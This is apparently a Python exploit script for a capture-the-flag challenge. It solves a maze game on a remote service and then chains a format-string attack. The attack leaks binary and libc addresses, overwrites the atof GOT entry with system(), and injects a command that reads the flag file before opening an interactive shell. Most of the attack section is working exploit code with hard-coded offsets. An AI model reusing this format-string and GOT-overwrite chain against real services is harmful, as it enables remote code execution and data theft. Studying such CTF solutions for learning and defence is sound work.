import socket | |
import time | |
import re | |
from Pwning import * | |
# Packing/format-string helper from the project-local Pwning module (not shown on
# this page). _solve() relies on pl.p()/pl.up() for 4-byte pack/unpack and on
# pl.build32FormatStringBug() — presumably 32-bit little-endian helpers; confirm in Pwning.
pl = Payload()
def get_socket(host, port):
    """Open a blocking IPv4 TCP connection to ``(host, port)`` and return the socket.

    No timeout is set, so every later recv() blocks until data or EOF arrives.
    """
    endpoint = (host, port)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(endpoint)
    return sock
def send(s, msg):
    """Send ``msg`` followed by a newline on socket ``s`` and echo ``msg`` to stdout.

    The trailing newline is appended here, so callers that already end their
    message with ``'\\n'`` produce a blank extra line on the wire.
    """
    line = msg + "\n"
    s.sendall(line)
    print('[+] Send: %r' % (msg,))
def recv(s):
    """Read one chunk (at most 4096 bytes) from socket ``s``, print it, and return it.

    An empty return value means the peer closed the connection; recv_until()
    depends on that to stop reading.
    """
    chunk = s.recv(4096)
    print(chunk)
    return chunk
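def recv_until(s, text):
    """Read from ``s`` until ``text`` appears in the accumulated data; return the data.

    Returns early with whatever was read when the peer closes the connection
    (recv() returns ``''``) or when the marker ``'TARDIS KEY:'`` shows up — the
    game-phase caller treats that marker as "the maze is over" regardless of
    ``text``. Every chunk is echoed to stdout by recv(). Blocks indefinitely if
    the peer stays silent, because the socket has no timeout.
    """
    data = ''
    while text not in data:
        new_data = recv(s)
        if new_data == '':
            break  # connection closed by the peer
        data += new_data
        if 'TARDIS KEY:' in data:
            return data
        # Short pause so a multi-line server response arrives in fewer chunks.
        # Uses the module-level `time` import; the original re-imported it here
        # on every iteration.
        time.sleep(0.01)
    return data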
""" | |
MAZE GAME | |
""" | |
g_map = None | |
g_found = False | |
g_path = None | |
MAP_WIDTH = 20 | |
MAP_HEIGHT = 20 | |
TARGET_X = 89 | |
TARGET_Y = 28 | |
g_best_solution = 'A' * 1000 | |
def get_valid_moves(moved_cells, x, y):
    """List the moves from column ``x``, row ``y`` onto a usable neighbour cell.

    A neighbour qualifies when it is inside the grid, its g_map cell is not
    ``'A'``, and ``moved_cells`` marks it as not yet visited. The result is
    ordered right, down, up, left — i.e. ``'d'``, ``'s'``, ``'w'``, ``'a'``.
    """
    # (move, neighbour column, neighbour row, in-bounds test), in output order.
    candidates = (
        ('d', x + 1, y, x < MAP_WIDTH - 1),
        ('s', x, y + 1, y < MAP_HEIGHT - 1),
        ('w', x, y - 1, y > 0),
        ('a', x - 1, y, x > 0),
    )
    moves = []
    for move, col, row, in_bounds in candidates:
        if not in_bounds:
            continue
        # `== False` kept rather than `not ...` for exact parity with the original test.
        if g_map[row][col] != 'A' and moved_cells[row][col] == False:
            moves.append(move)
    return moves
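def solve_rec(moved_cells, x, y, curr_path):
    """Depth-first search from column ``x``, row ``y`` for a g_map cell equal to ``'E'``.

    On success sets the module globals ``g_found = True`` and ``g_path`` to the
    move string that reaches the cell; returns None in every case. Branches
    whose path is longer than ``g_best_solution`` are pruned. Coordinates follow
    get_valid_moves(): ``x`` is the column and ``y`` the row, so the current
    cell is ``g_map[y][x]`` (the original checked ``g_map[x][y]``, which
    disagreed with its own neighbour lookup). ``moved_cells`` is mutated during
    the search and restored before returning.
    """
    # The original declared only g_best_solution global, so assigning g_found and
    # g_path created locals and the first `if g_found` raised UnboundLocalError.
    global g_found, g_path
    if g_found or len(curr_path) > len(g_best_solution):
        return
    if g_map[y][x] == 'E':
        g_found = True
        g_path = curr_path
        return
    # Column/row delta for each move letter produced by get_valid_moves().
    deltas = {'w': (0, -1), 's': (0, 1), 'a': (-1, 0), 'd': (1, 0)}
    for move in get_valid_moves(moved_cells, x, y):
        dx, dy = deltas[move]
        next_x, next_y = x + dx, y + dy
        moved_cells[next_y][next_x] = True
        solve_rec(moved_cells, next_x, next_y, curr_path + move)
        moved_cells[next_y][next_x] = False  # backtrack
        if g_found:
            return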
def get_person_position():
    """Return ``(row, col)`` of the first player glyph in g_map, or None.

    The glyphs are ``'^'``, ``'<'``, ``'>'`` and ``'V'``; the scan runs row by
    row from the top, left to right within a row.
    """
    for row_index in range(MAP_HEIGHT):
        row = g_map[row_index]
        for col_index in range(MAP_WIDTH):
            if row[col_index] in '^<>V':
                return (row_index, col_index)
    return None
def get_target_position():
    """Return ``(row, col)`` of the first ``'E'`` or ``'T'`` cell in g_map, or None.

    Row-major scan, same order as get_person_position().
    """
    for row_index in range(MAP_HEIGHT):
        row = g_map[row_index]
        for col_index in range(MAP_WIDTH):
            if row[col_index] in 'ET':
                return (row_index, col_index)
    return None
def get_moves(r, c):
    """Return the four orthogonal neighbours of ``(r, c)`` as (row, col) pairs.

    Order is down, up, right, left. No bounds check: neighbours may fall
    outside the grid.
    """
    offsets = ((1, 0), (-1, 0), (0, 1), (0, -1))
    return [(r + dr, c + dc) for dr, dc in offsets]
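def get_best_move(m):
    """Pick one greedy move (``'w'``, ``'a'``, ``'s'`` or ``'d'``) for the player on map ``m``.

    Stores ``m`` in the module global g_map (the position helpers read it),
    then scores each of the four neighbouring cells as
    ``nearest_A_distance - 100 * target_distance`` (both Manhattan distances,
    the target being the first ``'E'``/``'T'`` cell) and returns the direction
    of the highest-scoring cell; ties keep the earlier candidate. A cell that
    itself holds an ``'A'`` (distance 0) is never chosen. Returns None when no
    candidate qualifies or when no player/target glyph is present. Candidate
    cells are not bounds-checked, so the returned move can point off the grid.
    Debug lines are printed to stdout.
    """
    global g_map
    g_map = m
    person = get_person_position()
    target = get_target_position()
    print('person: %s' % (person,))
    print('target: %s' % (target,))
    # Missing glyphs used to raise TypeError on person[0]; report "no move" instead,
    # which the caller already treats as failure.
    if person is None or target is None:
        return None
    # Collect the 'A' cells once; the original rescanned the whole grid per candidate.
    enemies = [
        (r, c)
        for r in range(MAP_HEIGHT)
        for c in range(MAP_WIDTH)
        if g_map[r][c] == 'A'
    ]
    best_position_score = -1000000
    best_position = (0, 0)
    for p_r, p_c in get_moves(person[0], person[1]):
        # 1000 is the "no enemy" distance, as in the original accumulator.
        nearest_enemy = min([1000] + [abs(r - p_r) + abs(c - p_c) for r, c in enemies])
        target_distance = abs(target[0] - p_r) + abs(target[1] - p_c)
        position_score = nearest_enemy - target_distance * 100
        print('%s %d %d %d' % ((p_r, p_c), nearest_enemy, target_distance, position_score))
        if position_score > best_position_score and nearest_enemy != 0:
            best_position_score = position_score
            best_position = (p_r, p_c)
    if best_position_score == -1000000:
        return None
    # Translate the chosen cell back into a direction relative to the player.
    if best_position[0] < person[0]:
        return 'w'
    if best_position[0] > person[0]:
        return 's'
    if best_position[1] < person[1]:
        return 'a'
    return 'd'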
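def solve(m):
    """Find a move string from the player glyph to the ``'E'`` cell of map ``m`` by DFS.

    Stores ``m`` in g_map, resets the g_found/g_path search state (the original
    left stale results from an earlier call in place), and returns the path
    found by solve_rec(), or None when there is no player glyph or no path.
    get_valid_moves()/solve_rec() take ``(x=column, y=row)``, so the
    ``(row, col)`` pair from get_person_position() is swapped before the call.
    """
    global g_map, g_found, g_path
    g_map = m
    g_found = False
    g_path = None
    person_position = get_person_position()
    if person_position is None:
        return None
    start_row, start_col = person_position
    moved_cells = [[False] * MAP_WIDTH for _ in range(MAP_HEIGHT)]
    # The start cell is already visited; without this the search may loop back onto it.
    moved_cells[start_row][start_col] = True
    solve_rec(moved_cells, start_col, start_row, '')
    return g_path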
""" | |
MAZE GAME | |
""" | |
def read_map(raw):
    """Convert 20 raw map lines into a list of 20 character lists.

    The first three characters of every line are dropped (presumably a row
    prefix in the server output — confirm against a captured screen). Raises
    IndexError when ``raw`` has fewer than 20 entries, which the game loop in
    _solve() relies on to detect a truncated screen.
    """
    return [list(raw[row_index][3:]) for row_index in range(20)]
def xor_string(a, b):
    """XOR two strings character by character, truncated to the shorter one.

    Returns a str whose length equals ``min(len(a), len(b))``; each character
    is ``chr(ord(p) ^ ord(q))``. Not used elsewhere in this file.
    """
    shorter, longer = (b, a) if len(a) > len(b) else (a, b)
    return ''.join(chr(ord(p) ^ ord(q)) for p, q in zip(shorter, longer))
def get_key():
    """Derive the 10-character key that _solve() sends once the maze is finished.

    ``func`` holds bytes decoded from a hex string (redacted on this page).
    Each byte is masked to its low 7 bits and kept if the result is an ASCII
    letter or digit, until ten characters have been collected. Python 2 only:
    ``str.decode('hex')`` does not exist on Python 3 str.
    """
    import string  # unused — the alphabet is spelled out literally below
    func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decode('hex')
    key = ''
    for c in func:
        # Drop the high bit before the alphanumeric test and again when appending.
        if chr(ord(c) & 0x7f) in 'abcdefghijklmnopqrstuvwxyz' + 'abcdefghijklmnopqrstuvwxyz'.upper() + '0123456789':
            key += chr(ord(c) & 0x7f)
        if len(key) == 10:
            break
    return key
def _solve():
    """Run one session against the remote service: finish the maze, then walk the
    post-game menu using the hard-coded offsets below until an interactive session
    is handed over to telnetlib.

    Reconnects in a loop until a maze is completed. Every send/recv is echoed to
    stdout by the helpers. All addresses and offsets are constants for one
    specific build of the challenge binary and its libc; nothing here validates
    them. From the defender's side, the chain rests on user input reaching a
    printf-style formatter (the ``%275$p`` / ``%20$s`` probes below are echoed
    back) and on a GOT entry that is writable at runtime.
    """
    key = get_key()
    while True:
        s = get_socket('wwtw_c3722e23150e1d5abbc1c248d99d718d.quals.shallweplayaga.me', 2606)
        success = True
        # --- game phase: answer every move prompt with a greedy move ---
        while True:
            data = recv_until(s, 'Your move (w,a,s,d,q): ')
            if 'TARDIS KEY:' in data:
                break  # maze finished; the service moved on to the key prompt
            # The 20 lines before the prompt are the map; read_map() drops a 3-char row prefix.
            raw_map = data.split('Your move (w,a,s,d,q):')[0].split('\n')[-21:-1]
            try:
                game_map = read_map(raw_map)
            # NOTE(review): a bare except also swallows KeyboardInterrupt/SystemExit;
            # IndexError (short screen) is what read_map() is expected to raise here.
            except:
                success = False
                break
            best_move = get_best_move(game_map)
            if best_move is None:
                success = False  # no safe neighbour; give up on this connection
                break
            send(s, best_move)
        if success:
            # --- post-game phase ---
            send(s, key)
            recv(s)
            # NOTE(review): the nine NUL bytes and the packed 0x55592B6C + 1 value are
            # not explained on this page; presumably target-specific — confirm.
            send(s,'\x00'*9)
            recv(s)
            time.sleep(2)  # presumably lets the service finish its output — confirm
            send(s,pl.p(0x55592B6C + 1))
            recv(s)
            send(s,'\x00'*9)
            print repr(recv(s))
            send(s,pl.p(0x55592B6C + 1))
            time.sleep(1)
            send(s,'1\n')
            recv_until(s, 'The TARDIS console is online!')
            recv_until(s, 'Selection:')
            send(s,'3\n')
            recv_until(s, 'Coordinates: ')
            # Leak 1: a positional %p in the coordinates field is echoed back as a pointer.
            send(s,'51.492137,-0.192878 {}\n'.format('%275$p'))
            data = recv_until(s, 'would rip a hole in time and space. Choose again.')
            match = re.findall(r'.+ (0x[0-9a-f]*) .+',data)
            # NOTE(review): match[0] raises IndexError when no pointer is echoed; nothing catches it.
            base_bin = int(match[0],16) - 0x1491  # fixed distance from the leaked pointer to the binary's base
            read = base_bin + 0x5010               # presumably GOT slots of this build — confirm
            atof_got = base_bin + 0x5080
            print 'Base Bin :',hex(base_bin)
            recv_until(s, 'Coordinates: ')
            # Leak 2: %20$s dereferences the packed address placed at the start of the input.
            send(s,'51.492137,-0.192878 {}\n'.format(pl.p(read) + '%20$s'))
            data = recv_until(s, 'would rip a hole in time and space. Choose again.')
            print repr(data)
            data = data[52:]            # skip the echoed prefix; offset fixed for this response format
            read = pl.up(data[4:8])     # 4-byte values unpacked with the Pwning helper
            printf = pl.up(data[8:12])
            print 'read() : ',hex(read)
            print 'printf() : ',hex(printf)
            system = read - 0x9aa40     # libc-build-specific distance between read() and system()
            print 'system() : ',hex(system)
            recv_until(s, 'Coordinates: ')
            # Write: build32FormatStringBug() (Pwning helper, not shown here) places `system` at atof_got.
            send(s,pl.build32FormatStringBug(atof_got,system,20,'51.492137,-0.192878 '))
            recv_until(s, 'Coordinates: ')
            # The next coordinate string is presumably handed to the overwritten call — confirm.
            send(s,',,,,,,;cat /home/wwtw/flag;,,,,,,,,\n')
            # NOTE(review): telnetlib is not imported in this file; this relies on
            # `from Pwning import *` exporting it, otherwise NameError here.
            tn = telnetlib.Telnet()
            tn.sock = s
            tn.interact()
            break
# Runs on import as well as when executed directly; an `if __name__ == "__main__":`
# guard would keep the network session from starting on import.
_solve()